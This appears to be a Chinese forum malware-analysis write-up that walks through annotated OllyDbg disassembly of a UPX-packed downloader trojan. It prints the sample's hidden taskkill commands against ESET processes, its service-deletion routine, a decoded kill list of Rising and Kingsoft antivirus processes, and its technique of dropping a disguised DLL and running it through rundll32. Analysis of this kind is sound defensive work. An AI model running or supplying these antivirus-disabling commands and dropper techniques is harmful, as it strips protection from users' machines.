【加壳方式】: UPX
【使用工具】: OD
【软件介绍】: downloader(下载者木马)
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
用 PEiD 检测为 UPX 壳;脱壳后用 OD 载入分析。以下各段反汇编均为节选,地址不连续处为作者省略。
; Entry of the main routine after UPX unpacking (the function continues past this excerpt).
0040314A > $ 55 push ebp
0040314B . 8BEC mov ebp, esp
0040314D . 81EC 740B0000 sub esp, 0B74 ; ~2.9 KB of locals: the path buffers used further down
00403153 . 53 push ebx
00403154 . 56 push esi
00403155 . 57 push edi
00403156 . E8 A3E2FFFF call download.004013FE ; author's note: resolves system API addresses (body not shown here)
0040315B . 68 64134000 push download.00401364 ; /MutexName = "AAeesstt..." -- hard-coded name, usable as a host-based IOC
00403160 . 6A 00 push 0 ; |InitialOwner = FALSE
00403162 . 6A 00 push 0 ; |pSecurity = NULL
00403164 . FF15 60104000 call dword ptr ds:[<&KERNEL32.CreateMutexA>>; /CreateMutexA
0040316A . 8985 A0F6FFFF mov dword ptr ss:[ebp-960], eax ; keep the mutex handle
00403170 . FF15 C4114000 call dword ptr ds:[4011C4] ; ntdll.RtlGetLastWin32Error -- presumably tested for ERROR_ALREADY_EXISTS (single-instance check); the compare is not in this excerpt
下面获取系统 explorer.exe 路径:先在栈上逐字节拼出 "\Explorer.EXE"(这样该字符串不会出现在文件的明文字符串表中),再与 GetWindowsDirectoryA 返回的目录拼接成 %windir%\Explorer.EXE,供后面的 lstrcmpiA 路径比较使用
; Builds "\Explorer.EXE" one byte at a time on the stack (ebp-10 .. ebp-3), so the
; string never appears in the binary's string table, then prefixes it with %windir%.
004031D9 . C645 F0 5C mov byte ptr ss:[ebp-10], 5C ; '\'
004031DD . C645 F1 45 mov byte ptr ss:[ebp-F], 45 ; 'E'
004031E1 . C645 F2 78 mov byte ptr ss:[ebp-E], 78 ; 'x'
004031E5 . C645 F3 70 mov byte ptr ss:[ebp-D], 70 ; 'p'
004031E9 . C645 F4 6C mov byte ptr ss:[ebp-C], 6C ; 'l'
004031ED . C645 F5 6F mov byte ptr ss:[ebp-B], 6F ; 'o'
004031F1 . C645 F6 72 mov byte ptr ss:[ebp-A], 72 ; 'r'
004031F5 . C645 F7 65 mov byte ptr ss:[ebp-9], 65 ; 'e'
004031F9 . C645 F8 72 mov byte ptr ss:[ebp-8], 72 ; 'r'
004031FD . C645 F9 2E mov byte ptr ss:[ebp-7], 2E ; '.'
00403201 . C645 FA 45 mov byte ptr ss:[ebp-6], 45 ; 'E'
00403205 . C645 FB 58 mov byte ptr ss:[ebp-5], 58 ; 'X'
00403209 . C645 FC 45 mov byte ptr ss:[ebp-4], 45 ; 'E'
0040320D . 8065 FD 00 and byte ptr ss:[ebp-3], 0 ; NUL terminator
00403211 . 68 FF000000 push 0FF ; size 0xFF
00403216 . 6A 00 push 0 ; fill value 0
00403218 . 8D85 90F5FFFF lea eax, dword ptr ss:[ebp-A70]
0040321E . 50 push eax ; buffer
0040321F . E8 9C090000 call download.00403BC0 ; cdecl, (buf, 0, 0xFF): the argument shape of memset -- body not shown, not confirmed
00403224 . 83C4 0C add esp, 0C
00403227 . 68 FF000000 push 0FF
0040322C . 6A 00 push 0
0040322E . 8D85 ECFBFFFF lea eax, dword ptr ss:[ebp-414]
00403234 . 50 push eax
00403235 . E8 86090000 call download.00403BC0 ; same clear for the second path buffer
0040323A . 83C4 0C add esp, 0C
0040323D . 68 FF000000 push 0FF ; uSize
00403242 . 8D85 ECFBFFFF lea eax, dword ptr ss:[ebp-414]
00403248 . 50 push eax ; lpBuffer
00403249 . FF15 A4114000 call dword ptr ds:[4011A4] ; kernel32.GetWindowsDirectoryA -> ebp-414 = %windir%
0040324F . 68 FF000000 push 0FF
00403254 . 8D85 ECFCFFFF lea eax, dword ptr ss:[ebp-314]
0040325A . 50 push eax
0040325B . FF15 A4114000 call dword ptr ds:[4011A4] ; kernel32.GetWindowsDirectoryA -> ebp-314 = %windir% (second copy)
00403261 . 8D45 F0 lea eax, dword ptr ss:[ebp-10]
00403264 . 50 push eax ; /StringToAdd = the stack string "\Explorer.EXE"
00403265 . 8D85 ECFCFFFF lea eax, dword ptr ss:[ebp-314] ; |
0040326B . 50 push eax ; |ConcatString
0040326C . FF15 34104000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA -> ebp-314 = "%windir%\Explorer.EXE"
00403272 . 90 nop
; (listing gap: 00403273-00403383 omitted by the author)
00403384 . C685 90F6FFFF>mov byte ptr ss:[ebp-970], 5C ; '\' into another path buffer; author's note: path drivers\gm.dls (the forum rendering shows backslashes as '/')
; (listing gap: omitted by the author)
00403416 . FF15 00104000 call dword ptr ds:[<&KERNEL32.lstrcmpiA>] ; /lstrcmpiA -- author's note: case-insensitive compare of the current path with the Explorer.EXE path (the two pushed arguments are not in this excerpt)
0040341C . 85C0 test eax, eax
0040341E . 0F85 AC000000 jnz download.004034D0 ; taken when the paths differ
删除指定服务(服务名由参数 [ebp+8] 传入;作者写作 erkn,结合后面结束的 ekrn.exe 进程,推测实为 ESET 的 ekrn 服务)。OpenServiceA 的访问权限 0x10020 = DELETE | SERVICE_STOP,先 ControlService 停止再 DeleteService 删除,返回值均未检查
; Stops and deletes the service named by the routine's first argument ([ebp+8]);
; the OpenSCManagerA arguments are pushed before this excerpt.
00402742 . FF15 CC114000 call dword ptr ds:[4011CC] ; ADVAPI32.OpenSCManagerA
00402748 . 8945 FC mov dword ptr ss:[ebp-4], eax ; hSCManager
0040274B . 837D FC 00 cmp dword ptr ss:[ebp-4], 0
0040274F . 74 44 je short download.00402795 ; no SCM handle (e.g. insufficient rights) -> skip everything
00402751 . 68 20000100 push 10020 ; dwDesiredAccess = DELETE (0x10000) | SERVICE_STOP (0x20); OllyDbg's "UNICODE ..." label is a bogus pointer interpretation of this constant
00402756 . FF75 08 push dword ptr ss:[ebp+8] ; lpServiceName = first argument
00402759 . FF75 FC push dword ptr ss:[ebp-4] ; hSCManager
0040275C . FF15 E4114000 call dword ptr ds:[4011E4] ; ADVAPI32.OpenServiceA
00402762 . 8945 F8 mov dword ptr ss:[ebp-8], eax ; hService
00402765 . 837D F8 00 cmp dword ptr ss:[ebp-8], 0
00402769 . 74 21 je short download.0040278C ; service not present -> just close the SCM handle
0040276B . 8D45 DC lea eax, dword ptr ss:[ebp-24]
0040276E . 50 push eax ; lpServiceStatus (SERVICE_STATUS on the stack)
0040276F . 6A 01 push 1 ; dwControl = SERVICE_CONTROL_STOP
00402771 . FF75 F8 push dword ptr ss:[ebp-8] ; hService
00402774 . FF15 E0114000 call dword ptr ds:[4011E0] ; ADVAPI32.ControlService -- return value ignored
0040277A . FF75 F8 push dword ptr ss:[ebp-8]
0040277D . FF15 D4114000 call dword ptr ds:[4011D4] ; ADVAPI32.DeleteService -- marks the service for deletion; return value ignored
00402783 . FF75 F8 push dword ptr ss:[ebp-8]
00402786 . FF15 D8114000 call dword ptr ds:[4011D8] ; ADVAPI32.CloseServiceHandle (hService)
0040278C > FF75 FC push dword ptr ss:[ebp-4]
0040278F . FF15 D8114000 call dword ptr ds:[4011D8] ; ADVAPI32.CloseServiceHandle (hSCManager)
解码函数:对传入字符串的每个字节原地减 1(直接改写调用方的缓冲区),返回原指针
; String decoder: decrements every byte of the NUL-terminated string at [esp+C]
; in place and returns the same pointer. Because it writes back into the caller's
; buffer, running it twice on the same string decodes it twice (corrupting it).
00402035 /$ 56 push esi
00402036 |. 57 push edi
00402037 |. 8B7C24 0C mov edi, dword ptr ss:[esp+C] ; edi = string pointer (the argument)
0040203B |. 33F6 xor esi, esi ; esi = byte index
0040203D |. 57 push edi
0040203E |. E8 CD1A0000 call download.00403B10 ; author's note: returns the string length (strlen-like; body not shown)
00402043 |. 85C0 test eax, eax
00402045 |. 59 pop ecx
00402046 |. 76 0F jbe short download.00402057 ; empty string -> nothing to do
00402048 |> FE0C3E /dec byte ptr ds:[esi+edi] ; the whole "algorithm": byte -= 1, in place
0040204B |. 57 |push edi
0040204C |. 46 |inc esi
0040204D |. E8 BE1A0000 |call download.00403B10 ; length recomputed on every iteration
00402052 |. 3BF0 |cmp esi, eax ; eax = string length
00402054 |. 59 |pop ecx
00402055 |.^ 72 F1 /jb short download.00402048
00402057 |> 8BC7 mov eax, edi ; return the (now decoded) buffer
00402059 |. 5F pop edi
0040205A |. 5E pop esi
0040205B /. C3 retn ; cdecl: the caller pops the argument
干掉某xx杀软(ekrn.exe/egui.exe 为 ESET 的进程):两条命令串以编码形式存放,用前经上述解码函数还原,再通过 WinExec(SW_HIDE)以 cmd.exe /c taskkill 方式执行,随后 Sleep 6 秒
cmd.exe /c taskkill.exe /im ekrn.exe /f
cmd.exe /c taskkill.exe /im egui.exe /f
; Kills the ESET processes via WinExec'd "cmd.exe /c taskkill ..." command lines that
; are stored encoded and decoded just before use. The first command's arguments are
; pushed before this excerpt.
00402BA2 |. FF15 7C114000 call dword ptr ds:[40117C] ; kernel32.WinExec -- first command (presumably the ekrn.exe taskkill line, per the author's list)
00402BA8 |. 8D45 A8 lea eax, dword ptr ss:[ebp-58]
00402BAB |. 50 push eax
00402BAC |. E8 84F4FFFF call download.00402035 ; decode in place; author's note: yields "cmd.exe /c taskkill.exe /im egui.exe /f"
00402BB1 |. 59 pop ecx
00402BB2 |. 50 push eax ; lpString2 = decoded command line
00402BB3 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
00402BB9 |. 50 push eax ; lpString1
00402BBA |. FFD6 call esi ; kernel32.lstrcpyA (esi was loaded with the import before this excerpt)
00402BBC |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
00402BC2 |. 6A 00 push 0 ; uCmdShow = SW_HIDE
00402BC4 |. 50 push eax ; lpCmdLine
00402BC5 |. FF15 7C114000 call dword ptr ds:[40117C] ; kernel32.WinExec -- spawns cmd.exe -> taskkill.exe; detectable as a cmd.exe/taskkill.exe child of the sample
00402BCB |. 68 70170000 push 1770 ; /Timeout = 6000. ms -- gives taskkill time to finish
00402BD0 |. FF15 40104000 call dword ptr ds:[<&KERNEL32.Sleep>] ; /Sleep
生成要释放的临时文件名:wsprintfA 按 "%s%d.tt" 格式写入 0x401070(%s 参数就是该缓冲区本身,dump 中当前内容为 24131375.tt;%d 参数在节选之前压栈),再用 GetSystemDirectoryA 拼出 system32 下的完整路径
; Builds the drop path "<system32>\<name>.tt". wsprintfA takes four arguments here
; (add esp,10); the %d argument is pushed before this excerpt.
00402EF2 . 68 70104000 push download.00401070 ; ASCII "24131375.tt" -- %s argument: the destination buffer itself (OllyDbg shows its current contents)
00402EF7 . 68 50134000 push download.00401350 ; ASCII "%s%d.tt" -- format string
00402EFC . 68 70104000 push download.00401070 ; ASCII "24131375.tt" -- destination buffer
00402F01 . FF15 80114000 call dword ptr ds:[401180] ; USER32.wsprintfA
00402F07 . 83C4 10 add esp, 10 ; 4 arguments (cdecl)
00402F0A . 68 04010000 push 104 ; uSize = MAX_PATH
00402F0F . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C]
00402F15 . 50 push eax
00402F16 . FF15 A8114000 call dword ptr ds:[4011A8] ; kernel32.GetSystemDirectoryA -> ebp-34C = system32 directory
00402F1C . 68 4C134000 push download.0040134C ; /StringToAdd = "/" -- path separator (probably a backslash rendered as '/' by the forum)
00402F21 . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C] ; |
00402F27 . 50 push eax ; |ConcatString
00402F28 . FF15 34104000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA
00402F2E . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C]
00402F34 . 50 push eax ; /String2
00402F35 . 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120] ; |
00402F3B . 50 push eax ; |String1
00402F3C . FF15 28104000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; /lstrcpyA -> ebp-120 = "<system32>\" (the file name is presumably appended after this excerpt)
创建临时文件(CREATE_ALWAYS,覆盖同名文件),然后从自身资源中释放 dll 写入临时文件:资源的每个字节加 1 后逐字节 WriteFile,即资源是以"明文减 1"的形式存放的,与字符串解码(减 1)互为逆运算。注意 CreateFileA 失败时返回 INVALID_HANDLE_VALUE(-1),而代码只与 0 比较,失败时仍会进入写循环(WriteFile 逐个失败)
; Drop routine (stdcall, 2 args: [ebp+8] = output file name, [ebp+C] = resource name).
; Writes the resource to the file one byte at a time, adding 1 to each byte -- i.e. the
; embedded payload is stored as (plaintext - 1), the inverse of the string decoder.
0040209A . 6A 00 push 0 ; /hTemplateFile = NULL
0040209C . 6A 00 push 0 ; |Attributes = 0
0040209E . 6A 02 push 2 ; |Mode = CREATE_ALWAYS -- overwrites an existing file
004020A0 . 6A 00 push 0 ; |pSecurity = NULL
004020A2 . 6A 00 push 0 ; |ShareMode = 0
004020A4 . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004020A9 . FF75 08 push dword ptr ss:[ebp+8] ; |FileName
004020AC . FF15 20104000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004020B2 . 8945 F0 mov dword ptr ss:[ebp-10], eax
004020B5 . 8B45 F0 mov eax, dword ptr ss:[ebp-10]
004020B8 . 8945 F4 mov dword ptr ss:[ebp-C], eax ; hFile
004020BB . 837D F0 00 cmp dword ptr ss:[ebp-10], 0 ; bug: CreateFileA fails with INVALID_HANDLE_VALUE (-1), not 0, so a failed open still runs the loop (every WriteFile then fails)
004020BF . 0F84 9C000000 je download.00402161
004020C5 . 8D45 E8 lea eax, dword ptr ss:[ebp-18]
004020C8 . 50 push eax ; /ResourceType -- points at a type string kept on the stack (ebp-18), built before this excerpt
004020C9 . FF75 0C push dword ptr ss:[ebp+C] ; |ResourceName = second argument
004020CC . 6A 00 push 0 ; |hModule = NULL -> the sample's own image
004020CE . FF15 1C104000 call dword ptr ds:[<&KERNEL32.FindResourceA>] ; /FindResourceA -- result not checked
004020D4 . 8945 E4 mov dword ptr ss:[ebp-1C], eax
004020D7 . 8B45 E4 mov eax, dword ptr ss:[ebp-1C]
004020DA . 8945 E0 mov dword ptr ss:[ebp-20], eax ; hResInfo
004020DD . FF75 E4 push dword ptr ss:[ebp-1C] ; /hResource
004020E0 . 6A 00 push 0 ; |hModule = NULL
004020E2 . FF15 18104000 call dword ptr ds:[<&KERNEL32.LoadResource>] ; /LoadResource
004020E8 . 8945 D8 mov dword ptr ss:[ebp-28], eax
004020EB . 8B45 D8 mov eax, dword ptr ss:[ebp-28]
004020EE . 8945 F8 mov dword ptr ss:[ebp-8], eax ; hResData
004020F1 . 8365 D4 00 and dword ptr ss:[ebp-2C], 0 ; byte index = 0
004020F5 . FF75 D8 push dword ptr ss:[ebp-28] ; hResData
004020F8 . FF15 14104000 call dword ptr ds:[<&KERNEL32.LockResource>] ; LockResource -- OllyDbg's "/SetHandleCount" label is a mis-resolved annotation; the thunk is LockResource
004020FE . 8945 EC mov dword ptr ss:[ebp-14], eax ; pointer to the raw resource bytes
00402101 . 8065 FC 00 and byte ptr ss:[ebp-4], 0 ; 1-byte write buffer
00402105 . 90 nop
00402106 . FF75 E0 push dword ptr ss:[ebp-20] ; /hResource
00402109 . 6A 00 push 0 ; |hModule = NULL
0040210B . FF15 10104000 call dword ptr ds:[<&KERNEL32.SizeofResource>>; /SizeofResource
00402111 . 85C0 test eax, eax
00402113 . 74 3A je short download.0040214F ; empty/missing resource -> skip the loop
00402115 . 90 nop
00402116 > 8B45 EC mov eax, dword ptr ss:[ebp-14]
00402119 . 0345 D4 add eax, dword ptr ss:[ebp-2C]
0040211C . 0FB600 movzx eax, byte ptr ds:[eax] ; resource[i]
0040211F . 40 inc eax ; +1 per byte: undoes the (byte - 1) encoding applied when the payload was embedded
00402120 . 8845 FC mov byte ptr ss:[ebp-4], al
00402123 . 6A 00 push 0 ; /pOverlapped = NULL
00402125 . 8D45 DC lea eax, dword ptr ss:[ebp-24] ; |
00402128 . 50 push eax ; |pBytesWritten
00402129 . 6A 01 push 1 ; |nBytesToWrite = 1 -- one WriteFile call per payload byte
0040212B . 8D45 FC lea eax, dword ptr ss:[ebp-4] ; |
0040212E . 50 push eax ; |Buffer
0040212F . FF75 F4 push dword ptr ss:[ebp-C] ; |hFile
00402132 . FF15 0C104000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; /WriteFile -- return value ignored
00402138 . 8B45 D4 mov eax, dword ptr ss:[ebp-2C]
0040213B . 40 inc eax
0040213C . 8945 D4 mov dword ptr ss:[ebp-2C], eax ; i++
0040213F . FF75 E0 push dword ptr ss:[ebp-20] ; /hResource
00402142 . 6A 00 push 0 ; |hModule = NULL
00402144 . FF15 10104000 call dword ptr ds:[<&KERNEL32.SizeofResource>>; /SizeofResource -- re-queried on every iteration (loop invariant)
0040214A . 3945 D4 cmp dword ptr ss:[ebp-2C], eax
0040214D .^ 72 C7 jb short download.00402116 ; while (i < size)
0040214F > FF75 F8 push dword ptr ss:[ebp-8] ; /hResource
00402152 . FF15 08104000 call dword ptr ds:[<&KERNEL32.FreeResource>] ; /FreeResource
00402158 . FF75 F4 push dword ptr ss:[ebp-C] ; /hObject
0040215B . FF15 04104000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402161 > 5F pop edi
00402162 . 5E pop esi
00402163 . 5B pop ebx
00402164 . C9 leave
00402165 . C2 0800 retn 8 ; stdcall, two dword arguments
先 kill 掉一些杀软进程:16 个进程名以每字节加 1 的形式存放,运行时用解码函数原地减 1 并补上 .exe。解码后为瑞星(rstray、rsnetsvr、ccenter、scanfrm、ravmond、ravtask、rsmain、rfwsrv、ras)和金山(kavstart、kissvc、kmailmon、kpfw32、kpfwsvc、kwatch、kaccore)相关进程;每处理一个 Sleep 500ms。dump 中 "rstray" 已是明文,应是截图时第一项已被原地解码
00403052 . E8 67FCFFFF call download.00402CBE ; kill-AV-processes routine, listed below
; Routine 00402CBE: a 16-entry table of encoded process names (each byte stored +1) is
; decoded in place, ".exe" is appended, and each process is looked up and terminated with
; a 500 ms pause between entries. The decoded names match Rising (rs*/rav*/ccenter/
; scanfrm/rfwsrv) and Kingsoft (kav*/kis*/kpfw*/kwatch/kaccore) product processes.
; The loop's esi advance / edi countdown and back-edge lie after this excerpt.
00402CBE /$ 55 push ebp
00402CBF |. 8BEC mov ebp, esp
00402CC1 |. 81EC 40010000 sub esp, 140
00402CC7 |. 56 push esi
00402CC8 |. 57 push edi
00402CC9 |. 6A 10 push 10 ; 16 = number of table entries (popped into edi below)
00402CCB |. C745 C0 44134>mov dword ptr ss:[ebp-40], download.00401344 ; ASCII "rstray" -- already plaintext in this dump; the decoder writes in place, so the snapshot was presumably taken after the first iteration ran
00402CD2 |. C745 C4 38134>mov dword ptr ss:[ebp-3C], download.00401338 ; ASCII "stofutws" -> rsnetsvr
00402CD9 |. C745 C8 30134>mov dword ptr ss:[ebp-38], download.00401330 ; ASCII "ddfoufs" -> ccenter
00402CE0 |. C745 CC 28134>mov dword ptr ss:[ebp-34], download.00401328 ; ASCII "tdbogsn" -> scanfrm
00402CE7 |. C745 D0 20134>mov dword ptr ss:[ebp-30], download.00401320 ; ASCII "sbwnpoe" -> ravmond
00402CEE |. C745 D4 18134>mov dword ptr ss:[ebp-2C], download.00401318 ; ASCII "sbwubtl" -> ravtask
00402CF5 |. C745 D8 10134>mov dword ptr ss:[ebp-28], download.00401310 ; ASCII "stnbjo" -> rsmain
00402CFC |. C745 DC 08134>mov dword ptr ss:[ebp-24], download.00401308 ; ASCII "sgxtsw" -> rfwsrv
00402D03 |. C745 E0 04134>mov dword ptr ss:[ebp-20], download.00401304 ; ASCII "sbt" -> ras
00402D0A |. C745 E4 F8124>mov dword ptr ss:[ebp-1C], download.004012F8 ; ASCII "lbwtubsu" -> kavstart
00402D11 |. C745 E8 F0124>mov dword ptr ss:[ebp-18], download.004012F0 ; ASCII "ljttwd" -> kissvc
00402D18 |. C745 EC E4124>mov dword ptr ss:[ebp-14], download.004012E4 ; ASCII "lbnjmnpo" -> "kamilmon" as written; probably "kmailmon" ("lnbjmnpo") with two characters swapped in transcription
00402D1F |. C745 F0 DC124>mov dword ptr ss:[ebp-10], download.004012DC ; ASCII "lqgx43" -> kpfw32
00402D26 |. C745 F4 D4124>mov dword ptr ss:[ebp-C], download.004012D4 ; ASCII "lqgxtwd" -> kpfwsvc
00402D2D |. C745 F8 CC124>mov dword ptr ss:[ebp-8], download.004012CC ; ASCII "lxbudi" -> kwatch
00402D34 |. C745 FC C4124>mov dword ptr ss:[ebp-4], download.004012C4 ; ASCII "lbddpsf" -> kaccore
00402D3B |. 8D75 C0 lea esi, dword ptr ss:[ebp-40] ; esi = &table[0]
00402D3E |. 5F pop edi ; edi = 16 (entries remaining)
00402D3F |> 68 FF000000 /push 0FF
00402D44 |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D4A |. 6A 00 |push 0
00402D4C |. 50 |push eax
00402D4D |. E8 6E0E0000 |call download.00403BC0 ; (buf, 0, 0xFF): clears the name buffer (memset-like argument shape; body not shown)
00402D52 |. FF36 |push dword ptr ds:[esi] ; current encoded name
00402D54 |. E8 DCF2FFFF |call download.00402035 ; decode in place (byte -= 1); returns the same pointer
00402D59 |. 83C4 10 |add esp, 10
00402D5C |. 50 |push eax ; /String2 = decoded name
00402D5D |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140] ; |
00402D63 |. 50 |push eax ; |String1
00402D64 |. FF15 28104000 |call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; /lstrcpyA
00402D6A |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D70 |. 68 BC124000 |push download.004012BC ; /StringToAdd = ".exe"
00402D75 |. 50 |push eax ; |ConcatString
00402D76 |. FF15 34104000 |call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA -> "<name>.exe"
00402D7C |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D82 |. 50 |push eax
00402D83 |. E8 52FEFFFF |call download.00402BDA ; takes the image name; presumably looks the process up and returns a PID/handle -- body not shown
00402D88 |. 85C0 |test eax, eax
00402D8A |. 59 |pop ecx
00402D8B |. 74 07 |je short download.00402D94 ; not found -> skip
00402D8D |. 50 |push eax
00402D8E |. E8 BFFEFFFF |call download.00402C52 ; presumably terminates it -- body not shown
00402D93 |. 59 |pop ecx
00402D94 |> 68 F4010000 |push 1F4 ; /Timeout = 500. ms
00402D99 |. FF15 40104000 |call dword ptr ds:[<&KERNEL32.Sleep>] ; /Sleep -- pause between kills
创建进程,运行临时文件:通过 rundll32 把释放出的文件当作 DLL 加载(.tt 扩展名只是伪装)并调用其导出函数 testall
C:/WINDOWS/system32/rundll32.exe C:/WINDOWS/system32/24131375.tt testall
004030BD . FF15 54104000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; /CreateProcessA -- author's note: command line "rundll32.exe <system32>\24131375.tt testall": rundll32 loads the dropped file as a DLL (the .tt extension is cosmetic) and calls its export "testall"; arguments are pushed before this excerpt
等待运行完毕:关闭线程句柄后 WaitForSingleObject(hProcess, INFINITE) 阻塞,直到 rundll32(即 DLL 的 testall)退出
; After CreateProcessA: on success close the thread handle and block until rundll32 exits.
004030C3 . 85C0 test eax, eax
004030C5 . 74 14 je short download.004030DB ; CreateProcessA failed -> skip the wait
004030C7 . FF75 F4 push dword ptr ss:[ebp-C] ; /hObject -- consistent with PROCESS_INFORMATION.hThread (hProcess at ebp-10, hThread at ebp-C)
004030CA . FF15 04104000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004030D0 . 6A FF push -1 ; /Timeout = INFINITE -- blocks until the DLL's "testall" finishes
004030D2 . FF75 F0 push dword ptr ss:[ebp-10] ; |hObject = hProcess
004030D5 . FF15 50104000 call dword ptr ds:[<&KERNEL32.WaitForSingleObj>; /WaitForSingleObject -- hProcess is not closed within this excerpt
到此,病毒刚刚完成1/3的工作。歇一会,哈哈。